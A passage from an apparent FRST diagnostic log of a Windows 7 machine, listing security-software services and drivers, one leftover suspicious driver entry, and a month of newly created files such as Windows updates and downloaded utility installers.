Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-10-03] (Symantec Corporation) S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-10-03] (Symantec Corporation) S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation) R2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [13915888 2016-11-22] (Zemana Ltd.) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20161128.001\BHDrvx64.sys [1874136 2016-11-30] (Symantec Corporation) S3 C781BUS; C:\Windows\System32\DRIVERS\C781BUS.sys [99200 2011-07-14] (DEVGURU Co., LTD.) S3 C781Mdm; C:\Windows\System32\DRIVERS\C781Mdm.sys [183296 2011-07-14] (DEVGURU Co., LTD.(www.devguru.co.kr)) S3 C781Vsp; C:\Windows\System32\DRIVERS\C781Vsp.sys [183296 2011-07-14] (DEVGURU Co., LTD.(www.devguru.co.kr)) R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-10-03] (Symantec Corporation) R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation) R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-12-05] (Symantec Corporation) R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20161205.011\IDSvia64.sys [1012952 2016-10-26] (Symantec Corporation) R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-11-05] (LogMeIn, Inc.) S4 LMIRfsClientNP; no ImagePath R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161206.001\ENG64.SYS [138456 2016-12-05] (Symantec Corporation) R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161206.001\EX64.SYS [2148056 2016-12-05] (Symantec Corporation) R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-10-03] (Symantec Corporation) R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-10-03] (Symantec Corporation) S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-10-03] (Symantec Corporation) R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-10-03] (Symantec Corporation) R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-10-03] (Symantec Corporation) R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-03] (Symantec Corporation) R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-10-03] (Symantec Corporation) R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-10-03] (Symantec Corporation) R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2014-10-03] (Symantec Corporation) R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2016-12-07] (Zemana Ltd.) R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2016-12-07] (Zemana Ltd.) S3 catchme; \??\C:\ComboFix\catchme.sys [X] S0 pwygo; System32\drivers\bvbqpsa.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-12-07 05:16 - 2016-12-07 06:03 - 00034778 _____ C:\Windows\ZAM.krnl.trace 2016-12-07 05:16 - 2016-12-07 06:03 - 00012679 _____ C:\Windows\ZAM_Guard.krnl.trace 2016-12-07 05:16 - 2016-12-07 05:16 - 00203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zamguard64.sys 2016-12-07 05:16 - 2016-12-07 05:16 - 00203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zam64.sys 2016-12-07 05:16 - 2016-12-07 05:16 - 00000000 ____D C:\Users\Reception\AppData\Local\Zemana 2016-12-07 05:16 - 2016-12-07 05:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware 2016-12-07 05:16 - 2016-12-07 05:16 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware 2016-12-07 05:15 - 2016-12-07 05:15 - 05431336 _____ ( ) C:\Users\Reception\Downloads\Zemana.AntiMalware.Setup.exe 2016-12-06 05:52 - 2016-12-06 05:52 - 01065376 _____ (Google Inc.) C:\Users\Reception\Downloads\ChromeSetup (1).exe 2016-12-06 05:44 - 2016-12-06 05:44 - 00015182 _____ C:\Windows\system32\results.xml 2016-12-06 05:17 - 2016-12-06 05:17 - 40849704 _____ (Intel Corporation) C:\Users\Reception\Downloads\Win7Vista_64_151719.exe 2016-12-06 02:38 - 2016-12-06 02:38 - 125862080 _____ (Intel Corporation) C:\Users\Reception\Downloads\win64_153631.4414.exe 2016-12-06 02:36 - 2016-12-06 02:37 - 00000000 ____D C:\ProgramData\Package Cache 2016-12-06 02:35 - 2016-12-06 02:35 - 07491840 _____ (Intel) C:\Users\Reception\Downloads\Intel Driver Update Utility Installer.exe 2016-12-06 02:33 - 2016-12-06 02:33 - 86989752 _____ (Intel Corporation) C:\Users\Reception\Downloads\Win7Vista_64_152258.exe 2016-12-05 11:17 - 2016-12-05 11:17 - 00010168 ____N C:\bootsqm.dat 2016-12-02 04:56 - 2016-12-02 04:56 - 00244224 _____ C:\Users\Reception\Downloads\CF_UNINST.EXE 2016-12-02 03:02 - 2016-12-02 03:03 - 00000000 ____D C:\Program Files (x86)\CrystalDiskInfo 2016-12-02 03:02 - 2016-12-02 03:02 - 03956368 _____ (Crystal Dew World ) C:\Users\Reception\Downloads\CrystalDiskInfo7_0_4-en.exe 2016-12-02 03:02 - 2016-12-02 03:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo 2016-12-02 02:41 - 2016-12-02 02:45 - 00000000 ____D C:\Users\Reception\Doctor Web 2016-11-21 03:09 - 2016-12-07 06:03 - 00000000 ____D C:\FRST 2016-11-15 13:42 - 2016-11-15 15:41 - 00044360 __RSH C:\ProgramData\ntuser.pol 2016-11-14 18:46 - 2016-11-14 18:46 - 05659276 _____ (Swearware) C:\Users\Reception\Downloads\ComboFix (1).exe 2016-11-14 12:33 - 2016-11-14 12:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roadkil.Net 2016-11-14 12:33 - 2016-11-14 12:33 - 00000000 ____D C:\Program Files (x86)\Roadkil.Net 2016-11-14 12:32 - 2016-11-14 12:32 - 00362144 _____ (Roadkil.Net ) C:\Users\Reception\Downloads\CommTest.exe 2016-11-10 14:24 - 2016-07-14 04:09 - 00010240 _____ C:\Users\Reception\AppData\Local\Z@!-66cdbda3-850e-49fb-bcc4-315e343cf0e0.tmp 2016-11-10 14:24 - 2016-07-14 04:09 - 00009216 _____ C:\Users\Reception\AppData\Local\Z@S!-41305b6f-9545-4896-8e05-c1bc01799922.tmp 2016-11-10 14:23 - 2016-11-10 14:23 - 02308296 _____ (bomgar) C:\Users\Reception\Downloads\bomgar-scc-w0yc30wfd76ify8dz68xjy7xzf1ywwixfxi6xwc40jc90.exe 2016-11-09 14:24 - 2016-11-02 10:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll 2016-11-09 14:24 - 2016-11-02 10:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll 2016-11-09 14:24 - 2016-11-02 10:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll 2016-11-09 14:24 - 2016-11-02 10:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll 2016-11-09 14:24 - 2016-11-02 10:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll 2016-11-09 14:24 - 2016-11-02 09:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll 2016-11-09 14:24 - 2016-10-27 22:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2016-11-09 14:24 - 2016-10-27 22:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2016-11-09 14:24 - 2016-10-27 14:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-11-09 14:24 - 2016-10-27 14:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2016-11-09 14:24 - 2016-10-27 13:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2016-11-09 14:24 - 2016-10-27 13:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-11-09 14:24 - 2016-10-27 13:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2016-11-09 14:24 - 2016-10-27 13:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-11-09 14:24 - 2016-10-27 13:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2016-11-09 14:24 - 2016-10-27 13:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-11-09 14:24 - 2016-10-27 13:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-11-09 14:24 - 2016-10-27 13:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2016-11-09 14:24 - 2016-10-27 13:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-11-09 14:24 - 2016-10-27 13:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2016-11-09 14:24 - 2016-10-27 13:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-11-09 14:24 - 2016-10-27 13:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2016-11-09 14:24 - 2016-10-27 13:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-11-09 14:24 - 2016-10-27 13:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-11-09 14:24 - 2016-10-27 13:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2016-11-09 14:24 - 2016-10-27 13:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll 2016-11-09 14:24 - 2016-10-27 13:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2016-11-09 14:24 - 2016-10-27 13:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-11-09 14:24 - 2016-10-27 13:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-11-09 14:24 - 2016-10-27 13:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll 2016-11-09 14:24 - 2016-10-27 12:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2016-11-09 14:24 - 2016-10-27 12:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-11-09 14:24 - 2016-10-27 12:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2016-11-09 14:24 - 2016-10-27 12:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-11-09 14:24 - 2016-10-27 12:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2016-11-09 14:24 - 2016-10-27 12:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-11-09 14:24 - 2016-10-27 12:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-11-09 14:24 - 2016-10-27 12:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-11-09 14:24 - 2016-10-27 11:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2016-11-09 14:24 - 2016-10-27 10:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-11-09 14:24 - 2016-10-25 10:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-11-09 14:24 - 2016-10-22 12:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-11-09 14:24 - 2016-10-22 12:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2016-11-09 14:24 - 2016-10-22 12:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2016-11-09 14:24 - 2016-10-22 12:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-11-09 14:24 - 2016-10-22 12:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-11-09 14:24 - 2016-10-22 12:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2016-11-09 14:24 - 2016-10-22 12:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-11-09 14:24 - 2016-10-22 12:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-11-09 14:24 - 2016-10-22 12:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2016-11-09 14:24 - 2016-10-22 12:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-11-09 14:24 - 2016-10-22 12:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-11-09 14:24 - 2016-10-22 12:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-11-09 14:24 - 2016-10-22 12:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2016-11-09 14:24 - 2016-10-22 12:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-11-09 14:24 - 2016-10-22 12:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2016-11-09 14:24 - 2016-10-22 12:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll 2016-11-09 14:24 - 2016-10-22 11:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2016-11-09 14:24 - 2016-10-22 11:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-11-09 14:24 - 2016-10-22 11:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-11-09 14:24 - 2016-10-22 11:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll 2016-11-09 14:24 - 2016-10-22 11:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll 2016-11-09 14:24 - 2016-10-22 11:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-11-09 14:24 - 2016-10-22 11:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-11-09 14:24 - 2016-10-22 11:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-11-09 14:24 - 2016-10-22 11:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2016-11-09 14:24 - 2016-10-22 11:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-11-09 14:24 - 2016-10-22 11:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-11-09 14:24 - 2016-10-22 11:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-11-09 14:24 - 2016-10-22 11:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2016-11-09 14:24 - 2016-10-15 10:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll 2016-11-09 14:24 - 2016-10-15 10:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll 2016-11-09 14:24 - 2016-10-15 10:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll 2016-11-09 14:24 - 2016-10-15 10:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll 2016-11-09 14:24 - 2016-10-11 10:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys 2016-11-09 14:24 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME 2016-11-09 14:24 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll 2016-11-09 14:24 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2016-11-09 14:24 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll 2016-11-09 14:24 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME 2016-11-09 14:24 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll 2016-11-09 14:24 - 2016-10-11 10:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL 2016-11-09 14:24 - 2016-10-11 10:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll 2016-11-09 14:24 - 2016-10-11 10:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime 2016-11-09 14:24 - 2016-10-11 08:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll 2016-11-09 14:24 - 2016-10-11 08:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll 2016-11-09 14:24 - 2016-10-10 10:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2016-11-09 14:24 - 2016-10-10 10:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2016-11-09 14:24 - 2016-10-10 10:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2016-11-09 14:24 - 2016-10-10 10:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe 2016-11-09 14:24 - 2016-10-10 09:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe 2016-11-09 14:24 - 2016-10-10 09:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe 2016-11-09 14:24 - 2016-10-10 09:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll 2016-11-09 14:24 - 2016-10-07 10:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2016-11-09 14:24 - 2016-10-07 10:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-11-09 14:24 - 2016-10-07 10:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2016-11-09 14:24 - 2016-10-07 10:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2016-11-09 14:24 - 2016-10-07 